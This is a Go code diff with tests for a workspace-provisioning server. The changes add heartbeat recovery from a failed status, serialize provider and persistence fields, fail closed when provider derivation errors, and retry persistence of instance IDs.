if _, err := db.DB.ExecContext(ctx, `UPDATE workspaces SET status = $1, updated_at = now() WHERE id = $2 AND status = 'failed'`, models.StatusOnline, payload.WorkspaceID); err != nil {
|
||||
log.Printf("Heartbeat: failed to recover %s from failed: %v", payload.WorkspaceID, err)
|
||||
} else {
|
||||
log.Printf("Heartbeat: transitioned %s from failed to online (late heartbeat after provision-timeout)", payload.WorkspaceID)
|
||||
}
|
||||
h.broadcaster.RecordAndBroadcast(ctx, string(events.EventWorkspaceOnline), payload.WorkspaceID, map[string]interface{}{
|
||||
"recovered_from": currentStatus,
|
||||
})
|
||||
}
|
||||
|
||||
// #1870 Phase 1: drain one queued A2A request if the target reports
|
||||
// spare capacity. The heartbeat's active_tasks field reflects what the
|
||||
// workspace runtime is ACTUALLY running right now, independent of
|
||||
|
||||
@@ -193,6 +193,54 @@ func TestHeartbeatHandler_ProvisioningToOnline(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
// ==================== Heartbeat — failed → online recovery (#616 follow-up) ====================
|
||||
|
||||
// A workspace flipped to 'failed' by the provision-timeout sweeper must recover
|
||||
// to 'online' once it starts heartbeating: a live heartbeat proves the agent
|
||||
// booted (just slowly, past the 10m budget), so the timeout flip was premature.
|
||||
func TestHeartbeatHandler_FailedToOnline(t *testing.T) {
|
||||
mock := setupTestDB(t)
|
||||
setupTestRedis(t)
|
||||
broadcaster := newTestBroadcaster()
|
||||
handler := NewRegistryHandler(broadcaster)
|
||||
|
||||
mock.ExpectQuery("SELECT COALESCE\\(current_task").
|
||||
WithArgs("ws-failed").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"current_task"}).AddRow(""))
|
||||
|
||||
mock.ExpectExec("UPDATE workspaces SET").
|
||||
WithArgs("ws-failed", 0.0, "", 1, 3000, "").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
// evaluateStatus SELECT — currently failed (provision-timeout sweeper flip)
|
||||
mock.ExpectQuery("SELECT status FROM workspaces WHERE id =").
|
||||
WithArgs("ws-failed").
|
||||
WillReturnRows(sqlmock.NewRows([]string{"status"}).AddRow("failed"))
|
||||
|
||||
// the new failed → online recovery transition
|
||||
mock.ExpectExec("UPDATE workspaces SET status =").
|
||||
WithArgs(models.StatusOnline, "ws-failed").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
mock.ExpectExec("INSERT INTO structure_events").
|
||||
WillReturnResult(sqlmock.NewResult(0, 1))
|
||||
|
||||
w := httptest.NewRecorder()
|
||||
c, _ := gin.CreateTestContext(w)
|
||||
body := `{"workspace_id":"ws-failed","error_rate":0.0,"sample_error":"","active_tasks":1,"uptime_seconds":3000}`
|
||||
c.Request = httptest.NewRequest("POST", "/registry/heartbeat", bytes.NewBufferString(body))
|
||||
c.Request.Header.Set("Content-Type", "application/json")
|
||||
|
||||
handler.Heartbeat(c)
|
||||
|
||||
if w.Code != http.StatusOK {
|
||||
t.Errorf("expected status 200, got %d: %s", w.Code, w.Body.String())
|
||||
}
|
||||
if err := mock.ExpectationsWereMet(); err != nil {
|
||||
t.Errorf("unmet sqlmock expectations: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// ==================== Heartbeat — awaiting_agent → online recovery ====================
|
||||
// External workspaces flip to 'awaiting_agent' via healthsweep when their
|
||||
// heartbeat goes stale. When the operator's poller comes back, heartbeat
|
||||
|
||||
@@ -840,11 +840,23 @@ func (h *WorkspaceHandler) Create(c *gin.Context) {
|
||||
if _, err := os.Stat(runtimeDefault); err == nil {
|
||||
templatePath = runtimeDefault
|
||||
} else {
|
||||
configFiles = h.ensureDefaultConfig(id, payload)
|
||||
var cfgErr error
|
||||
configFiles, cfgErr = h.ensureDefaultConfig(id, payload)
|
||||
if cfgErr != nil {
|
||||
log.Printf("Create workspace %s: default config generation failed: %v", id, cfgErr)
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to generate workspace configuration"})
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
} else {
|
||||
configFiles = h.ensureDefaultConfig(id, payload)
|
||||
var cfgErr error
|
||||
configFiles, cfgErr = h.ensureDefaultConfig(id, payload)
|
||||
if cfgErr != nil {
|
||||
log.Printf("Create workspace %s: default config generation failed: %v", id, cfgErr)
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to generate workspace configuration"})
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// Auto-provision — pick backend: control plane (SaaS) or Docker (self-hosted).
|
||||
|
||||
@@ -112,7 +112,12 @@ func workspaceComputeIsZero(compute models.WorkspaceCompute) bool {
|
||||
compute.Display.Mode == "" &&
|
||||
compute.Display.Width == 0 &&
|
||||
compute.Display.Height == 0 &&
|
||||
compute.Display.Protocol == ""
|
||||
compute.Display.Protocol == "" &&
|
||||
// A provider- or persistence-only compute is NOT zero — it must
|
||||
// round-trip so GET returns those fields (canvas provider badge +
|
||||
// data-persistence selector both read them back).
|
||||
compute.Provider == "" &&
|
||||
compute.DataPersistence == ""
|
||||
}
|
||||
|
||||
func workspaceComputeJSON(compute models.WorkspaceCompute) (string, error) {
|
||||
@@ -142,6 +147,17 @@ func workspaceComputeJSON(compute models.WorkspaceCompute) (string, error) {
|
||||
if len(display) > 0 {
|
||||
out["display"] = display
|
||||
}
|
||||
// Cloud/compute provider + durable-data choice. These were FORWARDED to CP
|
||||
// at provision time but never serialized back here, so GET /workspaces
|
||||
// dropped them — the canvas provider badge always showed the default AWS and
|
||||
// the data-persistence selector always showed "auto". Round-trip them (still
|
||||
// omit-when-empty, so existing AWS/default rows serialize unchanged).
|
||||
if compute.Provider != "" {
|
||||
out["provider"] = compute.Provider
|
||||
}
|
||||
if compute.DataPersistence != "" {
|
||||
out["data_persistence"] = compute.DataPersistence
|
||||
}
|
||||
b, err := json.Marshal(out)
|
||||
if err != nil {
|
||||
return "", err
|
||||
|
||||
@@ -93,6 +93,38 @@ func TestWorkspaceComputeJSON_OmitsEmptyNestedSections(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
// Regression: provider + data_persistence were FORWARDED to CP but dropped from
|
||||
// the serialized compute, so GET /workspaces never returned them (the canvas
|
||||
// provider badge always showed AWS, the persistence selector always "auto").
|
||||
func TestWorkspaceComputeJSON_RoundTripsProviderAndDataPersistence(t *testing.T) {
|
||||
got, err := workspaceComputeJSON(models.WorkspaceCompute{
|
||||
InstanceType: "t3.medium",
|
||||
Provider: "gcp",
|
||||
DataPersistence: "persist",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("workspaceComputeJSON returned error: %v", err)
|
||||
}
|
||||
if !strings.Contains(got, `"provider":"gcp"`) {
|
||||
t.Fatalf("workspaceComputeJSON dropped provider: %s", got)
|
||||
}
|
||||
if !strings.Contains(got, `"data_persistence":"persist"`) {
|
||||
t.Fatalf("workspaceComputeJSON dropped data_persistence: %s", got)
|
||||
}
|
||||
}
|
||||
|
||||
// A provider-only compute must NOT be treated as zero (else it serializes to
|
||||
// "{}" and the cloud is lost).
|
||||
func TestWorkspaceComputeJSON_ProviderOnlyIsNotZero(t *testing.T) {
|
||||
got, err := workspaceComputeJSON(models.WorkspaceCompute{Provider: "hetzner"})
|
||||
if err != nil {
|
||||
t.Fatalf("workspaceComputeJSON returned error: %v", err)
|
||||
}
|
||||
if got == "{}" || !strings.Contains(got, `"provider":"hetzner"`) {
|
||||
t.Fatalf("provider-only compute serialized as zero: %s", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestWorkspaceCreate_WithCompute_PersistsComputeJSON(t *testing.T) {
|
||||
mock := setupTestDB(t)
|
||||
setupTestRedis(t)
|
||||
|
||||
@@ -14,11 +14,21 @@ import (
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/db"
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/memory/contract"
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/models"
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/providers"
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/provisioner"
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/wsauth"
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
// instanceIDPersistRetryAttempts caps total instance_id UPDATE attempts
|
||||
// (initial + retries). 3 catches transient DB blips without stalling the
|
||||
// provision goroutine past the context timeout.
|
||||
var instanceIDPersistRetryAttempts = 3
|
||||
|
||||
// instanceIDPersistRetryBaseDelay is the first-retry backoff. Doubles each
|
||||
// attempt: 100ms → 200ms → 400ms. Total stall ≤ 700ms.
|
||||
var instanceIDPersistRetryBaseDelay = 100 * time.Millisecond
|
||||
|
||||
// logProvisionPanic is the deferred recover at the top of every provision
|
||||
// goroutine. Without it, a panic inside provisionWorkspaceOpts /
|
||||
// provisionWorkspaceCP propagates up the goroutine stack and crashes the
|
||||
@@ -595,7 +605,14 @@ func sanitizeRuntime(raw string) string {
|
||||
|
||||
// ensureDefaultConfig generates minimal config files in memory for workspaces without a template.
|
||||
// Returns a map of filename → content to be written into the container's /configs volume.
|
||||
func (h *WorkspaceHandler) ensureDefaultConfig(workspaceID string, payload models.CreateWorkspacePayload) map[string][]byte {
|
||||
//
|
||||
// #2248 follow-up (provider-correctness): if the provider registry is
|
||||
// available and the runtime/model IS known, but DeriveProvider errors,
|
||||
// the error is propagated so provisioning is blocked rather than
|
||||
// generating a providerless config that re-derives to the wrong provider
|
||||
// at runtime. Unknown/federated runtimes and derive-misses still return
|
||||
// a providerless config (preserving today's pass-through behavior).
|
||||
func (h *WorkspaceHandler) ensureDefaultConfig(workspaceID string, payload models.CreateWorkspacePayload) (map[string][]byte, error) {
|
||||
files := make(map[string][]byte)
|
||||
|
||||
// Determine runtime — pass through the allowlist so an attacker
|
||||
@@ -641,10 +658,14 @@ func (h *WorkspaceHandler) ensureDefaultConfig(workspaceID string, payload model
|
||||
// Reuses the SAME manifest path the config-SAVE validators use
|
||||
// (providerRegistry() + Manifest.DeriveProvider; see
|
||||
// model_registry_validation.go). On a derive MISS (unknown/unregistered
|
||||
// model, or registry unavailable) provider is left empty and the field is
|
||||
// omitted below — preserving today's behavior; never fail provisioning on
|
||||
// a derive miss.
|
||||
derivedProvider := deriveDefaultConfigProvider(runtime, model)
|
||||
// model for a known runtime) provider is left empty and the field is
|
||||
// omitted below — preserving today's behavior. On a registry load error
|
||||
// or an exceptional DeriveProvider failure for a KNOWN runtime/model,
|
||||
// the error is propagated and provisioning is blocked.
|
||||
derivedProvider, err := deriveDefaultConfigProvider(runtime, model)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("ensureDefaultConfig: provider derivation failed for workspace %s (runtime=%s model=%s): %w", workspaceID, runtime, model, err)
|
||||
}
|
||||
|
||||
if runtime == "claude-code" {
|
||||
model = normalizeClaudeCodeModel(model)
|
||||
@@ -699,41 +720,94 @@ func (h *WorkspaceHandler) ensureDefaultConfig(workspaceID string, payload model
|
||||
files["config.yaml"] = []byte(configYAML)
|
||||
|
||||
log.Printf("Provisioner: generated %d config files for workspace %s (runtime: %s)", len(files), workspaceID, runtime)
|
||||
return files
|
||||
return files, nil
|
||||
}
|
||||
|
||||
// deriveDefaultConfigProvider resolves the provider name the adapter should
|
||||
// see for (runtime, model) using the SAME providers manifest the config-SAVE
|
||||
// validators use (providerRegistry() + Manifest.DeriveProvider; see
|
||||
// model_registry_validation.go). It is intentionally fail-OPEN: any miss
|
||||
// (empty model, registry unavailable, unknown runtime, or a model the runtime
|
||||
// does not own) returns "" so the caller omits the `provider:` field and the
|
||||
// generated config keeps its pre-fix shape. It NEVER fails provisioning.
|
||||
// model_registry_validation.go).
|
||||
//
|
||||
// Failure modes:
|
||||
// - Empty model → ("", nil) — pass-through, no provider stamp.
|
||||
// - Registry unavailable/load-error → ("", error) — fail-closed; provisioning
|
||||
// must not proceed on a degraded registry.
|
||||
// - Unknown/federated runtime → ("", nil) — pass-through; no first-party
|
||||
// provider exists, the runtime re-derives at boot.
|
||||
// - Known runtime + known model, but DeriveProvider errors (ambiguous match,
|
||||
// overlap, etc.) → ("", error) — fail-closed; a known model should never
|
||||
// fail derivation, so silently omitting the provider would generate a
|
||||
// providerless config that re-derives to the WRONG provider at runtime
|
||||
// (the moonshot→platform NOT_CONFIGURED class, #2248 follow-up).
|
||||
// - Known runtime + unregistered model (derive miss) → ("", nil) —
|
||||
// pass-through; preserves today's behavior for unregistered models.
|
||||
//
|
||||
// `model` must be the FULL, un-normalized id (e.g. "moonshot/kimi-k2.6") so
|
||||
// DeriveProvider's exact-id match resolves the canvas claude-code case to
|
||||
// provider=platform. The availableAuthEnv arg is nil here — config-generation
|
||||
// has no per-workspace auth context yet (secrets are injected at container
|
||||
// start), matching the validators' nil call.
|
||||
func deriveDefaultConfigProvider(runtime, model string) string {
|
||||
func deriveDefaultConfigProvider(runtime, model string) (string, error) {
|
||||
if strings.TrimSpace(model) == "" {
|
||||
return ""
|
||||
return "", nil
|
||||
}
|
||||
m, err := providerRegistry()
|
||||
if err != nil || m == nil {
|
||||
// Registry unavailable (a build-time defect the gen/sync gates catch).
|
||||
// Fail open — do not stamp a provider, do not block provisioning.
|
||||
return ""
|
||||
// Fail closed — don't provision on a degraded registry.
|
||||
return "", fmt.Errorf("provider registry unavailable: %w", err)
|
||||
}
|
||||
p, err := m.DeriveProvider(runtime, model, nil)
|
||||
return deriveDefaultConfigProviderFromManifest(m, runtime, model)
|
||||
}
|
||||
|
||||
// deriveDefaultConfigProviderFromManifest contains the core logic so it can be
|
||||
// unit-tested with mock manifests without touching the package-level singleton.
|
||||
func deriveDefaultConfigProviderFromManifest(manifest *providers.Manifest, runtime, model string) (string, error) {
|
||||
// Unknown/federated runtime — no first-party provider exists.
|
||||
// Pass-through explicitly so federation is not broken.
|
||||
native, ok := manifest.Runtimes[runtime]
|
||||
if !ok {
|
||||
return "", nil
|
||||
}
|
||||
|
||||
p, err := manifest.DeriveProvider(runtime, model, nil)
|
||||
if err != nil {
|
||||
// Unknown runtime (federation / non-first-party) or a model the
|
||||
// runtime does not own. Either way, omit the provider and let the
|
||||
// runtime fall back to its prior derivation — preserving today's
|
||||
// behavior for unregistered models.
|
||||
return ""
|
||||
// Derive miss for a known runtime (unregistered model) → pass-through.
|
||||
// We detect "known" vs "unknown" by checking whether the model is
|
||||
// recognized by ANY native provider of this runtime — either via an
|
||||
// exact-id match or a prefix match. If the runtime knows the model
|
||||
// (exact or prefix) but DeriveProvider still errors, the error is
|
||||
// exceptional (ambiguous prefix, overlap, etc.) and must fail-closed.
|
||||
// If the runtime does NOT recognize the model at all, it's a genuine
|
||||
// derive miss and the providerless config is the correct fallback.
|
||||
byName := make(map[string]providers.Provider, len(manifest.Providers))
|
||||
for _, prov := range manifest.Providers {
|
||||
byName[prov.Name] = prov
|
||||
}
|
||||
knownModel := false
|
||||
for _, ref := range native.Providers {
|
||||
// Exact-id match
|
||||
for _, mid := range ref.Models {
|
||||
if mid == model {
|
||||
knownModel = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if knownModel {
|
||||
break
|
||||
}
|
||||
// Prefix match
|
||||
if prov, ok := byName[ref.Name]; ok && prov.MatchesModel(model) {
|
||||
knownModel = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if knownModel {
|
||||
return "", fmt.Errorf("derive provider for known runtime/model %s/%s: %w", runtime, model, err)
|
||||
}
|
||||
return "", nil
|
||||
}
|
||||
return p.Name
|
||||
return p.Name, nil
|
||||
}
|
||||
|
||||
// yamlEscapeSingleQuotedProvider escapes a value for a YAML single-quoted
|
||||
@@ -1393,13 +1467,38 @@ func (h *WorkspaceHandler) provisionWorkspaceCP(workspaceID, templatePath string
|
||||
// Persist the backing instance id so later operations (terminal via
|
||||
// EIC+SSH, live logs, debug introspection) can resolve workspace → EC2
|
||||
// without re-asking CP on every request.
|
||||
if _, err := db.DB.ExecContext(ctx,
|
||||
`UPDATE workspaces SET instance_id = $2, updated_at = now() WHERE id = $1`,
|
||||
workspaceID, machineID); err != nil {
|
||||
// Non-fatal: provisioning succeeded, the workspace will still run.
|
||||
// The row stays without instance_id — terminal falls back to the
|
||||
// "CP-provisioned but unreachable" error, not a silent failure.
|
||||
log.Printf("CPProvisioner: persist instance_id failed for %s: %v", workspaceID, err)
|
||||
//
|
||||
// Bounded retry with exponential backoff: a transient DB blip must not
|
||||
// orphan a healthy running instance. If all retries fail, mark the
|
||||
// workspace failed and record the instance_id in the broadcast event +
|
||||
// last_sample_error so an operator/reaper can reconcile later. The live
|
||||
// EC2 is NOT terminated — it may contain valuable state. (#1)
|
||||
var persistErr error
|
||||
delay := instanceIDPersistRetryBaseDelay
|
||||
for attempt := 1; attempt <= instanceIDPersistRetryAttempts; attempt++ {
|
||||
_, persistErr = db.DB.ExecContext(ctx,
|
||||
`UPDATE workspaces SET instance_id = $2, updated_at = now() WHERE id = $1`,
|
||||
workspaceID, machineID)
|
||||
if persistErr == nil {
|
||||
if attempt > 1 {
|
||||
log.Printf("CPProvisioner: instance_id persist for %s succeeded on attempt %d", workspaceID, attempt)
|
||||
}
|
||||
break
|
||||
}
|
||||
if attempt < instanceIDPersistRetryAttempts {
|
||||
time.Sleep(delay)
|
||||
delay *= 2
|
||||
}
|
||||
}
|
||||
if persistErr != nil {
|
||||
log.Printf("CPProvisioner: CRITICAL persist instance_id failed for %s after %d attempts: %v — EC2 instance %s is RUNNING but UNTRACKED. Operator must manually reconcile or remove the workspace to trigger orphan cleanup.", workspaceID, instanceIDPersistRetryAttempts, persistErr, machineID)
|
||||
// Server-only log already captures the raw error above; broadcast gets
|
||||
// safe fields only (no client-visible DB error). Security: RC 9378.
|
||||
h.markProvisionFailed(ctx, workspaceID, "instance_id persist failed after retry — EC2 untracked", map[string]interface{}{
|
||||
"instance_id": machineID,
|
||||
"attempts": instanceIDPersistRetryAttempts,
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
log.Printf("CPProvisioner: workspace %s started as machine %s via control plane", workspaceID, machineID)
|
||||
|
||||
@@ -0,0 +1,149 @@
|
||||
package handlers
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/providers"
|
||||
)
|
||||
|
||||
// ==================== deriveDefaultConfigProviderFromManifest (#2248 follow-up) ====================
|
||||
|
||||
// TestDeriveProvider_UnknownRuntimePassThrough pins requirement #2: unknown /
|
||||
// federated runtimes that have no first-party provider entry must still
|
||||
// succeed providerless (derive returns ("", nil)).
|
||||
func TestDeriveProvider_UnknownRuntimePassThrough(t *testing.T) {
|
||||
manifest := &providers.Manifest{
|
||||
Runtimes: map[string]providers.RuntimeNativeSet{
|
||||
"claude-code": {
|
||||
Providers: []providers.RuntimeProviderRef{
|
||||
{Name: "anthropic", Models: []string{"sonnet"}},
|
||||
},
|
||||
},
|
||||
},
|
||||
Providers: []providers.Provider{
|
||||
{Name: "anthropic", ModelPrefixMatch: "^sonnet$"},
|
||||
},
|
||||
}
|
||||
|
||||
provider, err := deriveDefaultConfigProviderFromManifest(manifest, "federated-custom", "some-model")
|
||||
if err != nil {
|
||||
t.Fatalf("unknown runtime must pass-through, not error: %v", err)
|
||||
}
|
||||
if provider != "" {
|
||||
t.Errorf("unknown runtime must return empty provider, got %q", provider)
|
||||
}
|
||||
}
|
||||
|
||||
// TestDeriveProvider_DeriveMissPassThrough pins today's behavior: a model the
|
||||
// runtime does NOT natively own is a derive miss and must return ("", nil)
|
||||
// so the caller omits the provider field.
|
||||
func TestDeriveProvider_DeriveMissPassThrough(t *testing.T) {
|
||||
manifest := &providers.Manifest{
|
||||
Runtimes: map[string]providers.RuntimeNativeSet{
|
||||
"claude-code": {
|
||||
Providers: []providers.RuntimeProviderRef{
|
||||
{Name: "anthropic", Models: []string{"sonnet"}},
|
||||
},
|
||||
},
|
||||
},
|
||||
Providers: []providers.Provider{
|
||||
{Name: "anthropic", ModelPrefixMatch: "^sonnet$"},
|
||||
},
|
||||
}
|
||||
|
||||
provider, err := deriveDefaultConfigProviderFromManifest(manifest, "claude-code", "gpt-4o")
|
||||
if err != nil {
|
||||
t.Fatalf("derive miss must pass-through, not error: %v", err)
|
||||
}
|
||||
if provider != "" {
|
||||
t.Errorf("derive miss must return empty provider, got %q", provider)
|
||||
}
|
||||
}
|
||||
|
||||
// TestDeriveProvider_KnownModelErrorFailClosed pins requirement #1: when the
|
||||
// runtime AND model are both registry-known but DeriveProvider still errors
|
||||
// (ambiguous prefix, overlap, etc.), the error must be propagated so
|
||||
// provisioning is blocked — silently omitting the provider would generate a
|
||||
// providerless config that re-derives to the WRONG provider at runtime.
|
||||
func TestDeriveProvider_KnownModelErrorFailClosed(t *testing.T) {
|
||||
// Construct a manifest where TWO providers match the SAME model prefix,
|
||||
// causing DeriveProvider to return an ambiguous-match error. The model is
|
||||
// NOT in any exact list, but it matches both prefixes — so the runtime
|
||||
// DOES "know" the model (it matches native providers) and the error is
|
||||
// exceptional → must fail-closed.
|
||||
manifest := &providers.Manifest{
|
||||
Runtimes: map[string]providers.RuntimeNativeSet{
|
||||
"claude-code": {
|
||||
Providers: []providers.RuntimeProviderRef{
|
||||
{Name: "anthropic-api", Models: []string{"sonnet"}},
|
||||
{Name: "openai-sub", Models: []string{"gpt-4"}},
|
||||
},
|
||||
},
|
||||
},
|
||||
Providers: []providers.Provider{
|
||||
{Name: "anthropic-api", ModelPrefixMatch: "^gpt-"},
|
||||
{Name: "openai-sub", ModelPrefixMatch: "^gpt-"},
|
||||
},
|
||||
}
|
||||
|
||||
provider, err := deriveDefaultConfigProviderFromManifest(manifest, "claude-code", "gpt-4o")
|
||||
if err == nil {
|
||||
t.Fatal("ambiguous match for known model must fail-closed, got nil error")
|
||||
}
|
||||
if provider != "" {
|
||||
t.Errorf("fail-closed must return empty provider, got %q", provider)
|
||||
}
|
||||
if !strings.Contains(err.Error(), "derive provider for known runtime/model") {
|
||||
t.Errorf("error should signal known-model fail-closed, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// TestDeriveProvider_RegistryLoadErrorFailClosed pins requirement #3:
|
||||
// when the provider registry itself fails to load (build-time defect, degraded
|
||||
// disk, corrupted manifest), provisioning must be blocked — do not silently
|
||||
// generate a providerless config on a degraded registry.
|
||||
func TestDeriveProvider_RegistryLoadErrorFailClosed(t *testing.T) {
|
||||
oldProviderRegistry := providerRegistry
|
||||
providerRegistry = func() (*providers.Manifest, error) {
|
||||
return nil, errors.New("test registry load failure")
|
||||
}
|
||||
defer func() { providerRegistry = oldProviderRegistry }()
|
||||
|
||||
provider, err := deriveDefaultConfigProvider("claude-code", "sonnet")
|
||||
if err == nil {
|
||||
t.Fatal("registry load error must fail-closed, got nil error")
|
||||
}
|
||||
if provider != "" {
|
||||
t.Errorf("fail-closed must return empty provider, got %q", provider)
|
||||
}
|
||||
if !strings.Contains(err.Error(), "provider registry unavailable") {
|
||||
t.Errorf("error should signal registry-unavailable fail-closed, got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// TestDeriveProvider_KnownModelSuccess confirms the happy path: a known
|
||||
// runtime/model that DeriveProvider resolves cleanly returns the provider name.
|
||||
func TestDeriveProvider_KnownModelSuccess(t *testing.T) {
|
||||
manifest := &providers.Manifest{
|
||||
Runtimes: map[string]providers.RuntimeNativeSet{
|
||||
"claude-code": {
|
||||
Providers: []providers.RuntimeProviderRef{
|
||||
{Name: "platform", Models: []string{"moonshot/kimi-k2.6"}},
|
||||
},
|
||||
},
|
||||
},
|
||||
Providers: []providers.Provider{
|
||||
{Name: "platform", ModelPrefixMatch: "^moonshot/"},
|
||||
},
|
||||
}
|
||||
|
||||
provider, err := deriveDefaultConfigProviderFromManifest(manifest, "claude-code", "moonshot/kimi-k2.6")
|
||||
if err != nil {
|
||||
t.Fatalf("known model success should not error: %v", err)
|
||||
}
|
||||
if provider != "platform" {
|
||||
t.Errorf("provider = %q, want platform", provider)
|
||||
}
|
||||
}
|
||||
@@ -104,12 +104,15 @@ func TestEnsureDefaultConfig_StampsProviderForEverySSOTPlatformModel(t *testing.
|
||||
broadcaster := newTestBroadcaster()
|
||||
handler := NewWorkspaceHandler(broadcaster, nil, "http://localhost:8080", t.TempDir())
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-platform-boot", models.CreateWorkspacePayload{
|
||||
files, err := handler.ensureDefaultConfig("ws-platform-boot", models.CreateWorkspacePayload{
|
||||
Name: "Platform Boot Agent",
|
||||
Tier: 2,
|
||||
Runtime: runtime,
|
||||
Model: model,
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed for model %q: %v", model, err)
|
||||
}
|
||||
|
||||
raw, ok := files["config.yaml"]
|
||||
if !ok {
|
||||
|
||||
@@ -12,6 +12,7 @@ import (
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/memory/contract"
|
||||
"git.moleculesai.app/molecule-ai/molecule-core/workspace-server/internal/models"
|
||||
@@ -236,7 +237,10 @@ func TestEnsureDefaultConfig_Hermes(t *testing.T) {
|
||||
Model: "anthropic:claude-opus-4-7",
|
||||
}
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-test-123", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-test-123", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
configYAML, ok := files["config.yaml"]
|
||||
if !ok {
|
||||
@@ -274,7 +278,10 @@ func TestEnsureDefaultConfig_ClaudeCode(t *testing.T) {
|
||||
Model: "sonnet",
|
||||
}
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-code-123", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-code-123", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
configYAML, ok := files["config.yaml"]
|
||||
if !ok {
|
||||
@@ -329,12 +336,15 @@ runtime_config:
|
||||
}
|
||||
handler := NewWorkspaceHandler(broadcaster, nil, "http://localhost:8080", configsDir)
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-code-123", models.CreateWorkspacePayload{
|
||||
files, err := handler.ensureDefaultConfig("ws-code-123", models.CreateWorkspacePayload{
|
||||
Name: "Code Agent",
|
||||
Tier: 4,
|
||||
Runtime: "claude-code",
|
||||
Model: "minimax/MiniMax-M2.7",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
var parsed struct {
|
||||
Model string `yaml:"model"`
|
||||
@@ -374,12 +384,15 @@ func TestEnsureDefaultConfig_StampsDerivedProvider(t *testing.T) {
|
||||
broadcaster := newTestBroadcaster()
|
||||
handler := NewWorkspaceHandler(broadcaster, nil, "http://localhost:8080", t.TempDir())
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-moonshot", models.CreateWorkspacePayload{
|
||||
files, err := handler.ensureDefaultConfig("ws-moonshot", models.CreateWorkspacePayload{
|
||||
Name: "Kimi Agent",
|
||||
Tier: 2,
|
||||
Runtime: "claude-code",
|
||||
Model: "moonshot/kimi-k2.6",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
var parsed struct {
|
||||
Model string `yaml:"model"`
|
||||
@@ -414,12 +427,15 @@ func TestEnsureDefaultConfig_DeriveMissOmitsProvider(t *testing.T) {
|
||||
broadcaster := newTestBroadcaster()
|
||||
handler := NewWorkspaceHandler(broadcaster, nil, "http://localhost:8080", t.TempDir())
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-derivemiss", models.CreateWorkspacePayload{
|
||||
files, err := handler.ensureDefaultConfig("ws-derivemiss", models.CreateWorkspacePayload{
|
||||
Name: "Unregistered Agent",
|
||||
Tier: 1,
|
||||
Runtime: "claude-code",
|
||||
Model: "gpt-4o",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
content := string(files["config.yaml"])
|
||||
if strings.Contains(content, "provider:") {
|
||||
@@ -442,7 +458,10 @@ func TestEnsureDefaultConfig_CustomModel(t *testing.T) {
|
||||
Model: "gpt-4o",
|
||||
}
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-custom", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-custom", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
configYAML := string(files["config.yaml"])
|
||||
if !contains(configYAML, `model: "gpt-4o"`) {
|
||||
@@ -461,7 +480,10 @@ func TestEnsureDefaultConfig_SpecialCharsInName(t *testing.T) {
|
||||
Runtime: "claude-code",
|
||||
}
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-special", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-special", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
|
||||
|
||||
configYAML := string(files["config.yaml"])
|
||||
// Names with special chars should be quoted
|
||||
@@ -481,7 +503,10 @@ func TestEnsureDefaultConfig_OpenClawGetsRuntimeConfig(t *testing.T) {
|
||||
Model: "openai:gpt-4o",
|
||||
}
|
||||
|
||||
files := handler.ensureDefaultConfig("ws-openclaw", payload)
|
||||
files, err := handler.ensureDefaultConfig("ws-openclaw", payload)
|
||||
if err != nil {
|
||||
t.Fatalf("ensureDefaultConfig failed: %v", err)
|
||||
}
